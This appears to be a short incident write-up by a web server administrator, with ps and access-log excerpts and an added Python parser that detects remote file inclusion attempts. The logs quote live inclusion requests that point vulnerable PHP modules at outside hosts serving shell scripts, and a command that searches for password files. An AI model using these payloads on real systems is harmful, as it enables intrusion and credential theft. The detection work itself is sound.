
While logging ps output for the apache user, the following activity was recorded.
2007年 6月 25日 月曜日 16:32:19 JST
2007年 6月 25日 月曜日 16:32:29 JST
apache 5201 6.7 0.2 3876 632 ? R 16:32 0:00 find / -type f -name service.pwd
2007年 6月 25日 月曜日 16:32:39 JST
2007年 6月 27日 水曜日 11:55:46 JST
apache 14665 8.8 0.2 1620 552 ? R 11:55 0:00 find / -type f -name service.pwd

Checking the access logs turned up entries like the following.
[root@www httpd]# grep modify.php *-access_log | grep -v 404 | grep 27/Jun/2007:11
aimssinc.com-access_log:libwww-perl/5.805 195.91.143.151 - - [27/Jun/2007:11:08:40 +0900] "GET /modules/xfsection/article.php?articleid=162/modules/xfsection/modify.php?dir_module=http://www.newcomp.com.ua/administrator/components/com_remository/images/rshells? HTTP/1.1" 200 680
[root@www httpd]# grep modify.php *-access_log | grep -v 404 | grep 25/Jun/2007:16
sensho-ds.com-access_log:libwww-perl/5.803 front.zzr.com - - [25/Jun/2007:16:13:28 +0900] "GET //modules/xfsection/modify.php?dir_module=http://www.geocities.com/xpejuang/safe.txt? HTTP/1.1" 302 292
sensho-ds.com-access_log:libwww-perl/5.805 alpha.hostfury.net - - [25/Jun/2007:16:20:22 +0900] "GET //modules/xfsection/modify.php?dir_module=http://crotz.tk/cmd.do? HTTP/1.1" 302 292
[root@www httpd]#

There were many more.

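The hour-by-hour grep shown earlier, as an added example that is not part of the original page: a parser for the log layout in that grep output which flags any request passing an absolute URL as a parameter value, including the form with a second "?" nested in the path, and lists the ones in the hour before a suspicious process was seen. The sample lines, placeholder hosts, function names and the 60-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Layout of the grep output above (assumed): file:User-Agent host - - [time] "request" status bytes
LINE = re.compile(
    r'^(?P<file>[^:]+):(?P<ua>.*) (?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/\d\.\d" (?P<status>\d{3}) \S+$')
# A parameter whose value is an absolute URL. Searched anywhere in the target,
# because these requests can nest a second "?" inside the first parameter's value.
REMOTE = re.compile(r'[?&]([\w.\[\]-]+)=((?:https?|ftp)://[^\s&]+)', re.I)

def find_remote_includes(lines):
    """Return one dict per request that passes a URL as a parameter value."""
    hits = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        p = REMOTE.search(unquote(m['target']))  # decode %3A%2F%2F first
        if p:
            hits.append({'file': m['file'], 'ua': m['ua'], 'host': m['host'],
                         'time': datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'),
                         'status': int(m['status']), 'param': p.group(1),
                         'url': p.group(2).rstrip('?')})
    return hits

def preceding(hits, seen_at, minutes=60):
    """Hits logged in the window before a suspicious process was observed."""
    return [h for h in hits
            if timedelta(0) <= seen_at - h['time'] <= timedelta(minutes=minutes)]

# Constructed sample lines (placeholder hosts and addresses), same layout as above.
SAMPLE = [
    'www.example.test-access_log:libwww-perl/5.65 192.0.2.10 - - [25/Jun/2007:12:00:00 +0900] "GET /modify.php?dir_module=http://files.example.net/c.txt? HTTP/1.1" 302 292',
    'www.example.test-access_log:libwww-perl/5.805 192.0.2.10 - - [25/Jun/2007:16:13:28 +0900] "GET //modules/xfsection/modify.php?dir_module=http://files.example.net/a.txt? HTTP/1.1" 302 292',
    'www.example.test-access_log:Mozilla/3.0 (compatible; Indy Library) 198.51.100.7 - - [25/Jun/2007:16:20:22 +0900] "GET /modules/xfsection/article.php?articleid=162/modules/xfsection/modify.php?dir_module=http%3A%2F%2Ffiles.example.net%2Fb.txt HTTP/1.1" 200 680',
    'www.example.test-access_log:Mozilla/5.0 203.0.113.5 - - [25/Jun/2007:16:25:00 +0900] "GET /modules/xfsection/article.php?articleid=22 HTTP/1.1" 200 680',
]
# Time at which the ps log showed the find process (first observation on the page).
SEEN_AT = datetime(2007, 6, 25, 16, 32, 29, tzinfo=timezone(timedelta(hours=9)))

if __name__ == '__main__':
    for h in preceding(find_remote_includes(SAMPLE), SEEN_AT):
        print(h['time'].isoformat(), h['status'], h['host'], h['param'], h['url'])
```

Matching on a window before the observed process, rather than on the same clock hour as the grep does, also catches requests that arrived just before the hour rolled over.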

